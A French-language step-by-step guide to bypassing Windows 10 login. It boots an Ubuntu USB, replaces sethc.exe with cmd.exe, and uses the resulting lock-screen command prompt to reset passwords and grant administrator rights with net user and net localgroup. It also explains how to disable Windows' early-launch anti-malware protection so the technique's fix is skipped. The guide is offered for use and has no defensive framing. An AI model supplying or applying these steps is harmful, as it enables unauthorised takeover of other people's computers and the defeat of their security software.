# Bypass l'authentification Windows 10
Le but est d'avoir un accès administrateur sur une machine Windows 10.  
Cette méthode fonctionne sur la dernière version de Windows 10 à ce jour (03/10/2023).  
Elle exploite la vulnérabilité [Win32/AccessibilityEscalation](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/AccessibilityEscalation.A&ThreatID=2147728981){ target=about_blank }.  
Le principe est de remplacer un programme accessible depuis l'écran de verrouillage Windows par cmd.exe.  
L'invite de commande ouvert, on aura accès à une session administrateur pour changer notre mot de passe (entre autres).  
Précédemment, on changeait l'utilitaire ==utilman.exe==, qui est le panneau d'accessibilité en bas à droite.  
Utilman.exe a été remplacé par utildll.dll, cet exploit n'est plus disponible.  
On utilise maintenant ==sethc.exe==, qui est l'utilitaire des "sticky keys", accessible en appuyant ==5 fois sur Majuscule (Shift)==.  

## Prérequis

 - Une clé Ubuntu
 - Système non chiffré

## Mise en place
Objectif: remplacer sethc.exe par cmd.exe

 - Booter sur Ubuntu
 
 - Monter la partition Windows
 ```console
 $ lsblk
 ```
 ```
 $ sudo mount /dev/sdX /mnt
 ```

 - Se placer dans System32
 ```console
 $ cd /mnt/Windows/System32
 ```
 
 - Backup du fichier sethc.exe
 ```console
 $ cp sethc.exe sethc.exe.bak
 ```
 
 - Remplacement du fichier
 ```console
 $ cp cmd.exe sethc.exe
 ```
 
 - Rebooter Windows
 
 - Appuyer 5 fois sur la touche Maj  
 Si une fenêtre d'invite de commande s'affiche, l'exploit est reussi

??? bug "Si l'invite de commande ne s'affiche pas"
    Il sera alors nécessaire de désactiver la protection anti-malwares dans les options de démarrage Windows.  
    Pour ce faire :  
      - Dans Windows, choisir "Redémarrer" en maintenant la touche Shift  
      - Choisir "Dépannage"  
      - Choisir "Paramètres"  
      - Choisir "Désactiver la protection anti-malware"  
    Et réessayer d'appuyer 5 fois sur la touche Shift au moment du reboot pour faire apparaitre l'invite de commande.  
    Cette manipulation désactive la protection Windows Defender au démarrage de la session, donc potentiellement le correctif Win32/AccesibilityEscalation.  


### Commandes d'administration des utilisateurs
!!! info "Pour connaitre le nom d'utilisateur, aller dans C:\Users"  
!!! bug "Il est impossible de modifier un compte en ligne avec la commande net user"
Changer le mot de passe:
```console
$ net user <utilisateur> <nouveau mot de passe>
```
Activer le compte Administrateur:
```console
$ net user administrator /active:yes
```
Changer un utilisateur normal en administateur:
```console
$ net localgroup administrators "UserAccountName" /add
```